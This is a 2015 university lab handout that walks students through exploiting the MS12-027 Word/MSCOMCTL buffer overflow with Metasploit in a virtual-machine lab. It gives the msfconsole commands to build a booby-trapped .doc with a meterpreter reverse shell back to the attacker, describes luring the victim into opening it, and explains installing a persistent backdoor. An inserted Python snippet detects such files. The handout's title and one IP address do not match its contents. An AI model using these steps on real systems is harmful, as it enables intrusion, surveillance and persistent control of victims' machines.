
ACADEMY OF CRYPTOGRAPHY TECHNIQUES (HỌC VIỆN KỸ THUẬT MẬT MÃ)

FACULTY OF INFORMATION SECURITY


LAB MODULE

OPERATING SYSTEM SECURITY

LAB EXERCISE NO. 01.01 [i]

SYSTEM AND DATA BACKUP [ii]

Lab author:


NG TH THY LINH

HANOI, 2015

TABLE OF CONTENTS

TABLE OF CONTENTS

GENERAL INFORMATION ABOUT THE LAB

LAB PREPARATION

For the instructor

For students

PART 1. EXPLOITING SOFTWARE VULNERABILITIES WITH METASPLOIT

1.1. Lab model

1.2. Exploitation steps

1.3. Reference section
GENERAL INFORMATION ABOUT THE LAB
Lab name: Exploiting software vulnerabilities with Metasploit
Module:
Number of students working together: 01
Location: computer lab
Requirements:
Hardware requirements:
Each student is assigned 01 computer with a minimum configuration of: CPU 2.0 GHz, RAM 2GB, HDD 50GB
Software requirements on the machine:
VMware Workstation 9.0 or later
Lab tools:
VMware virtual machines: Windows XP SP3, Kali Linux.
Microsoft Office 2007
LAN connection required: Yes
Internet connection required: No
Other requirements: projector, whiteboard, board markers/chalk
Tools provided with this document:

LAB PREPARATION

For the instructor
Before the session, the instructor (the person guiding the lab) needs to check that the actual conditions of the lab room match the requirements of the lab exercise.
Nothing else is required.

For students
Before starting the lab, create copies of the virtual machines to be used.
Also identify where the tools listed in the requirements section are stored.

PART 1. EXPLOITING SOFTWARE VULNERABILITIES WITH METASPLOIT
As we know, the best-known and most widely used word processor today is Microsoft Word, part of the Microsoft Office suite from Microsoft.
This is exactly what makes Microsoft Word an environment that hackers can abuse to attack, exploit and steal information on a user's machine when the user opens a document that contains malicious code.
The flaw covered here is a buffer overflow discovered in Microsoft Word. With this flaw, a user who opens a Word document unknowingly executes malicious code that gives the attacker control of the system.
Word documents can be embedded in other documents of the Microsoft Office suite, such as Excel and PowerPoint. Opening any document that embeds a Word document containing malicious code still causes that code to be executed on the victim's machine.

1.1. Lab model


Hacker machine:
Operating system: Kali Linux
IP: 192.168.121.128
Victim machine:
Operating system: Windows XP
IP: 192.168.121.126

The software vulnerability is exploited in the following steps:
Step 1: The attacker creates a malicious file with a .doc extension and sends it to the victim.
Step 2: By some means (for example a fake web server that lures the victim into downloading the file, or an e-mail attachment, ...) the victim receives and opens the file containing the malicious code.
Step 3: The file containing the malicious code exploits the vulnerability in Microsoft Word to create a backdoor that allows a reverse connection to the attacker's machine, giving the attacker control of the victim's machine.

1.2. Exploitation steps


Step 1: Create the file containing the malicious code
To carry out the attack, the attacker uses the MS12-027 MSCOMCTL ActiveX Buffer Overflow module. This module exploits a buffer overflow in MSCOMCTL.OCX. It uses an RTF file containing malicious code that embeds the special control MSComctlLib.ListViewCtrl.2 on the victim's machine.
The attacker opens Metasploit on the Kali machine and selects the module used for the attack:
msfconsole
msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof

Next, the attacker supplies the required information, such as the payload, the attacker machine's address and the port the attacker listens on, to complete the malicious file and send it to the victim.
Once all the information has been supplied, the module gives the attacker a malicious file named msf.doc. The attacker can change the file name to gain the victim's trust and lure the victim into downloading and opening the file.
msf exploit(ms12_027_mscomctl_bof) > set FILENAME baithuchanh.doc
msf exploit(ms12_027_mscomctl_bof) > set payload windows/meterpreter/reverse_tcp

One of the payloads hackers commonly use is meterpreter, simply because it is hard to detect and supports many options while exploiting the victim machine, such as keylog, webcam and hashdump. The reverse_tcp in the command parameter allows the connection to be made back to the attacker's machine. Put simply, the attacker's machine opens a port in advance and waits for the victim machine to connect to it.
msf exploit(ms12_027_mscomctl_bof) > set LHOST 192.168.121.128
msf exploit(ms12_027_mscomctl_bof) > exploit
msf exploit(ms12_027_mscomctl_bof) > cp /root/.msf4/local/baithuchanh.doc /root/Desktop

Step 2: Send the malicious file to the victim and wait for the victim to open it


Once the file containing the malicious code has been created, the attacker can take this file, send it to the victim and wait for the victim to open it, which starts the reverse connection back to the attacker's machine.
Within the scope of this lab, to simulate the victim downloading and opening the malicious file, we can copy the file directly to the victim machine (Windows XP SP3) or set up a web server and upload the file "baithuchanh.doc" so that the victim can browse to it and download it, as shown below:

Create a listener


msf exploit(ms12_027_mscomctl_bof) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.119.132
msf exploit(handler) > exploit
The victim browses to the web server and downloads the file containing the malicious code.

As soon as the victim opens the file, the malicious code is injected into the machine.

Step 3: The attacker exploits the victim machine

The malicious code is injected from machine 192.168.121.128:4444 to machine 192.168.121.126:1048.
There is now a session connected to the victim's machine.
Type getuid to see the username, getinfo to see information about the machine, ls C:\ to view the drive and mkdir to create a directory; in short, the attacker fully controls the victim machine.
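
Seen from the defending side, the file produced in step 1 has two properties a mail or file gateway can check: it is RTF content delivered under a .doc name, and it embeds the MSComctlLib.ListViewCtrl.2 control. The scanner below is an added example, not part of the original lab or of Metasploit; it assumes the class name appears as ASCII inside the hex-encoded \objdata group, and the names scan, decode_objdata and the finding labels are hypothetical.

```python
import re

# Class name of the embedded control named in step 1 (COM ProgIDs are case-insensitive).
SUSPECT_PROGIDS = (b"mscomctllib.listviewctrl.2",)

# Body of an \objdata group up to the next brace; nested groups are not followed.
OBJDATA_RE = re.compile(rb"\\objdata(?![a-zA-Z])([^{}]*)")
CONTROL_WORD_RE = re.compile(rb"\\[a-zA-Z]+-?\d* ?")


def is_rtf(data: bytes) -> bool:
    # Word accepts the shortened "{\rt" signature, so test for that prefix.
    return data.lstrip()[:4] == b"{\\rt"


def decode_objdata(body: bytes) -> bytes:
    """Hex-decode one \\objdata body, skipping control words and whitespace."""
    body = CONTROL_WORD_RE.sub(b"", body)
    digits = re.sub(rb"[^0-9a-fA-F]", b"", body)
    return bytes.fromhex(digits[: len(digits) // 2 * 2].decode("ascii"))


def scan(filename: str, data: bytes) -> list[str]:
    """Return findings for one attachment; an empty list means nothing matched."""
    findings = []
    if not is_rtf(data):
        return findings
    if not filename.lower().endswith(".rtf"):
        findings.append("rtf-content-under-other-extension")
    for match in OBJDATA_RE.finditer(data):
        decoded = decode_objdata(match.group(1)).lower()
        for progid in SUSPECT_PROGIDS:
            if progid in decoded:
                findings.append("embedded-control:" + progid.decode())
    return findings


# Constructed, benign sample: an RTF object group whose data is only the
# length-prefixed class name, with no control payload behind it.
_name = b"MSComctlLib.ListViewCtrl.2\x00"
_objdata = (len(_name).to_bytes(4, "little") + _name).hex().encode()
SAMPLE = (b"{\\rtf1{\\object\\objocx{\\*\\objdata " + _objdata[:30] + b"\r\n"
          + _objdata[30:] + b"}}}")

if __name__ == "__main__":
    print(scan("baithuchanh.doc", SAMPLE))
    print(scan("notes.doc", b"{\\rtf1 plain text}"))
```

The check matches the control's class name only, so it flags every RTF file that embeds this control, not just ones carrying the overflow; treat a hit as a reason to quarantine and inspect.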

1.3. Reference section


When the victim closes the doc file, the session is disconnected immediately, so the connection between the attacking machine and the victim machine is lost. For this reason, as soon as a session exists the attacker immediately installs a BACKDOOR on the victim's machine in order to reconnect to it easily. Each time the victim uses the computer, the BACKDOOR immediately opens an arbitrary port on the victim's machine and connects to the attacker's IP address and port; if the attacker is listening, a session is opened.
Reference for running the BACKDOOR:

Here we see several important parameters:
-X start together with the system
-i time interval between connection attempts
-p connection port
-r IP address of the attacker's machine

Create a file named persistence.rc with the following content:

Run the script using msfconsole

The attacker can then connect back to the victim machine without having to exploit the security vulnerability again.
[i] Numbered according to the order of the lab exercise within each module. The module number consists of 2 digits and the number of the exercise within the module consists of 2 digits.
[ii] Use the exact name of the lab exercise from the assignment list.
